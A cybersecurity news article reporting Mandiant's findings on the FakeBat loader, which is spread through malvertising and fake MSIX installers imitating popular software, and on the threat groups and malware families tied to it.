FakeBat Loader Fuels Increase in Cyber Attacks

Cybersecurity researchers have recently observed a spike in malware infections attributed to malvertising campaigns. These attacks deploy a malicious loader known as FakeBat, which has become increasingly prevalent.

You might be interested in: Phishing Attack Uses Google & WhatsApp Links

“The nature of these attacks is opportunistic, focusing on users searching for popular business software,” the Mandiant Managed Defense team explained in a recent technical report. “They target individuals who are specifically seeking certain types of software.” The infection process starts with a compromised MSIX installer that triggers a PowerShell script to download additional malware.

FakeBat, also referred to as EugenLoader or PaykLoader, is associated with a cybercriminal group known as Eugenfest. This group is part of a broader Malware-as-a-Service (MaaS) operation, tracked by Google’s threat intelligence unit under the codename NUMOZYLOD.

How the Attack Works

The attack relies on drive-by download tactics, where unsuspecting users are directed to fake websites that closely resemble legitimate software download pages. These sites host tampered MSI installers, which then spread various types of malware. Among the threats delivered by FakeBat are IcedID, RedLine Stealer, Lumma Stealer, SectopRAT (also called ArechClient2), and Carbanak, a Trojan linked to the FIN7 cybercrime group.

“UNC4536, the group behind these operations, uses malvertising to push MSIX installers disguised as popular software like Brave, KeePass, Notion, Steam, and Zoom,” Mandiant reported. “These malicious installers are hosted on lookalike websites designed to trick users into downloading them.”

The distinguishing feature of this attack is the use of MSIX installers camouflaged as well-known software. These installers can run a script before launching the primary application, leveraging a feature called startScript.

FakeBat’s Role in Malware Distribution

UNC4536 acts as a malware distributor, with FakeBat serving as a delivery tool for additional malicious payloads on behalf of their commercial partners, including FIN7.

“NUMOZYLOD collects system details like the operating system, domain status, and installed antivirus software,” according to Mandiant Technologies. “In some cases, it even gathers the public IPv4 and IPv6 addresses of the infected machine, sends this data to its command-and-control (C2) server, and creates a persistent shortcut in the StartUp folder.”

Similar Attacks

This discovery comes just weeks after Mandiant shed light on the lifecycle of another malware downloader called EMPTYSPACE (also known as BrokerLoader or Vetta Loader). This tool has been used by a financially motivated group called UNC4990 to conduct data theft and cryptojacking attacks, particularly against organizations in Italy.

These developments underscore the growing threat of malvertising and the importance of cybersecurity vigilance in protecting against evolving malware delivery techniques.